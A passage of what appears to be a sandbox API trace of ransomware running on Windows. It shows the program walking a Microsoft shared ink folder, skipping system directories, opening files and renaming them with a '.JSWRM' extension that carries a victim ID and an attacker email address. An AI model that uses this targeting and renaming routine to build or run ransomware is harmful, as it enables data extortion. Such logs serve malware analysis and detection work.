ftLastWriteTime.dwLowDateTime=0x7d14d081, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xa0a, dwReserved0=0x60002, dwReserved1=0x20942e, cFileName="ipsid.xml", cAlternateFileName="")) returned 1 [0068.445] lstrcmpiW (lpString1="ipsid.xml", lpString2=".") returned 1 [0068.445] lstrcmpiW (lpString1="ipsid.xml", lpString2="..") returned 1 [0068.445] lstrcmpiW (lpString1="ipsid.xml", lpString2="...") returned 1 [0068.445] lstrcmpiW (lpString1="ipsid.xml", lpString2="windows") returned -1 [0068.445] lstrcmpiW (lpString1="ipsid.xml", lpString2="recovery") returned -1 [0068.445] lstrcmpiW (lpString1="ipsid.xml", lpString2="perflogs") returned -1 [0068.445] lstrcmpiW (lpString1="ipsid.xml", lpString2="documents and settings") returned 1 [0068.445] lstrcmpiW (lpString1="ipsid.xml", lpString2="$RECYCLE.BIN") returned 1 [0068.445] lstrcmpiW (lpString1="ipsid.xml", lpString2="system volume information") returned -1 [0068.445] lstrcmpiW (lpString1="ipsid.xml", lpString2="msocache") returned -1 [0068.445] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0068.445] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ipsid.xml", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0068.445] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ipsid.xml", cchWideChar=9, lpMultiByteStr=0x345ef40, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ipsid.xml", lpUsedDefaultChar=0x0) returned 9 [0068.445] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0068.445] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0068.445] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ipsid.xml", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0068.445] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ipsid.xml", cchWideChar=9, lpMultiByteStr=0x345ef10, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ipsid.xml", lpUsedDefaultChar=0x0) returned 9 [0068.445] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0068.445] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225878 [0068.445] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2257f0 | out: hHeap=0x1e0000) returned 1 [0068.445] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0068.445] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0068.445] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225658 [0068.445] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsid.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsid.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0068.445] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=9667421629732440) returned 0 [0068.446] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0068.446] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24d1d8 [0068.446] ReadFile (in: hFile=0xffffffff, lpBuffer=0x24d1d8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24d1d8, lpNumberOfBytesRead=0x345ec04*=0x0, lpOverlapped=0x0) returned 0 [0068.446] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d1d8 | out: hHeap=0x1e0000) returned 1 [0068.446] CloseHandle (hObject=0xffffffff) returned 1 [0068.446] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225768 [0068.446] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0068.446] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0068.446] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f8328, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0068.446] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0068.446] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0068.446] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0068.446] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a408 [0068.446] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a408, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0068.446] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a408 | out: hHeap=0x1e0000) returned 1 [0068.446] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0068.446] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0068.446] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0068.446] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0068.446] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsid.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsid.xml"), lpNewFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsid.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsid.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 0 [0068.448] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0068.448] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225768 | out: hHeap=0x1e0000) returned 1 [0068.448] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225658 | out: hHeap=0x1e0000) returned 1 [0068.448] FindNextFileW (in: hFindFile=0x231f40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7c940eb6, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x7c940eb6, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x7c940eb6, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x9de, dwReserved0=0x60002, dwReserved1=0x20942e, cFileName="ipsita.xml", cAlternateFileName="")) returned 1 [0068.448] lstrcmpiW (lpString1="ipsita.xml", lpString2=".") returned 1 [0068.448] lstrcmpiW (lpString1="ipsita.xml", lpString2="..") returned 1 [0068.448] lstrcmpiW (lpString1="ipsita.xml", lpString2="...") returned 1 [0068.448] lstrcmpiW (lpString1="ipsita.xml", lpString2="windows") returned -1 [0068.448] lstrcmpiW (lpString1="ipsita.xml", lpString2="recovery") returned -1 [0068.448] lstrcmpiW (lpString1="ipsita.xml", lpString2="perflogs") returned -1 [0068.448] lstrcmpiW (lpString1="ipsita.xml", lpString2="documents and settings") returned 1 [0068.448] lstrcmpiW (lpString1="ipsita.xml", lpString2="$RECYCLE.BIN") returned 1 [0068.448] lstrcmpiW (lpString1="ipsita.xml", lpString2="system volume information") returned -1 [0068.448] lstrcmpiW (lpString1="ipsita.xml", lpString2="msocache") returned -1 [0068.448] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0068.448] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ipsita.xml", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0068.448] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ipsita.xml", cchWideChar=10, lpMultiByteStr=0x345ef40, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ipsita.xml", lpUsedDefaultChar=0x0) returned 10 [0068.448] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0068.448] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411f0 [0068.448] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ipsita.xml", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0068.448] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ipsita.xml", cchWideChar=10, lpMultiByteStr=0x345ef10, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ipsita.xml", lpUsedDefaultChar=0x0) returned 10 [0068.448] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411f0 | out: hHeap=0x1e0000) returned 1 [0068.448] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224e60 [0068.448] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225878 | out: hHeap=0x1e0000) returned 1 [0068.448] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0068.449] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0068.449] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225328 [0068.449] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsita.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsita.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0068.478] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=9656323434238760) returned 0 [0068.478] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0068.478] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24d1d8 [0068.478] ReadFile (in: hFile=0xffffffff, lpBuffer=0x24d1d8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24d1d8, lpNumberOfBytesRead=0x345ec04*=0x0, lpOverlapped=0x0) returned 0 [0068.478] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d1d8 | out: hHeap=0x1e0000) returned 1 [0068.478] CloseHandle (hObject=0xffffffff) returned 1 [0068.478] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224c40 [0068.478] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0068.478] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0068.478] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f8328, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0068.479] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0068.479] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0068.479] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0068.479] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a378 [0068.479] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a378, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0068.479] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a378 | out: hHeap=0x1e0000) returned 1 [0068.479] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0068.479] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0068.479] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0068.479] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0068.479] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsita.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsita.xml"), lpNewFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsita.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsita.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 0 [0068.479] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0068.479] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224c40 | out: hHeap=0x1e0000) returned 1 [0068.479] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225328 | out: hHeap=0x1e0000) returned 1 [0068.479] FindNextFileW (in: hFindFile=0x231f40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7c96711d, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x7c96711d, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x7c96711d, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x9da, dwReserved0=0x60002, dwReserved1=0x20942e, cFileName="ipsjpn.xml", cAlternateFileName="")) returned 1 [0068.479] lstrcmpiW (lpString1="ipsjpn.xml", lpString2=".") returned 1 [0068.479] lstrcmpiW (lpString1="ipsjpn.xml", lpString2="..") returned 1 [0068.479] lstrcmpiW (lpString1="ipsjpn.xml", lpString2="...") returned 1 [0068.479] lstrcmpiW (lpString1="ipsjpn.xml", lpString2="windows") returned -1 [0068.479] lstrcmpiW (lpString1="ipsjpn.xml", lpString2="recovery") returned -1 [0068.479] lstrcmpiW (lpString1="ipsjpn.xml", lpString2="perflogs") returned -1 [0068.479] lstrcmpiW (lpString1="ipsjpn.xml", lpString2="documents and settings") returned 1 [0068.479] lstrcmpiW (lpString1="ipsjpn.xml", lpString2="$RECYCLE.BIN") returned 1 [0068.479] lstrcmpiW (lpString1="ipsjpn.xml", lpString2="system volume information") returned -1 [0068.479] lstrcmpiW (lpString1="ipsjpn.xml", lpString2="msocache") returned -1 [0068.479] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0068.479] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ipsjpn.xml", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0068.479] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ipsjpn.xml", cchWideChar=10, lpMultiByteStr=0x345ef40, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ipsjpn.xml", lpUsedDefaultChar=0x0) returned 10 [0068.479] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0068.479] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0068.479] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ipsjpn.xml", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0068.480] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ipsjpn.xml", cchWideChar=10, lpMultiByteStr=0x345ef10, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ipsjpn.xml", lpUsedDefaultChar=0x0) returned 10 [0068.480] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0068.480] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224bb8 [0068.480] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224e60 | out: hHeap=0x1e0000) returned 1 [0068.480] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0068.480] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0068.480] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225328 [0068.480] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsjpn.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsjpn.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0068.480] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=9653402856477480) returned 0 [0068.480] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0068.480] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24d1d8 [0068.480] ReadFile (in: hFile=0xffffffff, lpBuffer=0x24d1d8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24d1d8, lpNumberOfBytesRead=0x345ec04*=0x0, lpOverlapped=0x0) returned 0 [0068.480] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d1d8 | out: hHeap=0x1e0000) returned 1 [0068.480] CloseHandle (hObject=0xffffffff) returned 1 [0068.480] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225190 [0068.480] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0068.480] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0068.480] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f8328, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0068.480] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0068.480] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0068.480] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0068.480] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a480 [0068.480] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a480, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0068.480] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a480 | out: hHeap=0x1e0000) returned 1 [0068.480] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0068.480] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0068.480] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0068.480] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0068.480] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsjpn.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsjpn.xml"), lpNewFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsjpn.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsjpn.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 0 [0068.481] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0068.481] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225190 | out: hHeap=0x1e0000) returned 1 [0068.481] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225328 | out: hHeap=0x1e0000) returned 1 [0068.481] FindNextFileW (in: hFindFile=0x231f40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d100bae, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x7d100bae, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x7d100bae, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xa08, dwReserved0=0x60002, dwReserved1=0x20942e, cFileName="ipskor.xml", cAlternateFileName="")) returned 1 [0068.481] lstrcmpiW (lpString1="ipskor.xml", lpString2=".") returned 1 [0068.481] lstrcmpiW (lpString1="ipskor.xml", lpString2="..") returned 1 [0068.481] lstrcmpiW (lpString1="ipskor.xml", lpString2="...") returned 1 [0068.481] lstrcmpiW (lpString1="ipskor.xml", lpString2="windows") returned -1 [0068.481] lstrcmpiW (lpString1="ipskor.xml", lpString2="recovery") returned -1 [0068.481] lstrcmpiW (lpString1="ipskor.xml", lpString2="perflogs") returned -1 [0068.481] lstrcmpiW (lpString1="ipskor.xml", lpString2="documents and settings") returned 1 [0068.481] lstrcmpiW (lpString1="ipskor.xml", lpString2="$RECYCLE.BIN") returned 1 [0068.481] lstrcmpiW (lpString1="ipskor.xml", lpString2="system volume information") returned -1 [0068.481] lstrcmpiW (lpString1="ipskor.xml", lpString2="msocache") returned -1 [0068.481] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0068.481] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ipskor.xml", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0068.481] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ipskor.xml", cchWideChar=10, lpMultiByteStr=0x345ef40, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ipskor.xml", lpUsedDefaultChar=0x0) returned 10 [0068.481] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0068.481] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0068.481] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ipskor.xml", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0068.481] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ipskor.xml", cchWideChar=10, lpMultiByteStr=0x345ef10, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ipskor.xml", lpUsedDefaultChar=0x0) returned 10 [0068.481] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0068.481] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225548 [0068.481] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224bb8 | out: hHeap=0x1e0000) returned 1 [0068.481] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0068.481] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0068.481] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224d50 [0068.481] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipskor.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipskor.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, 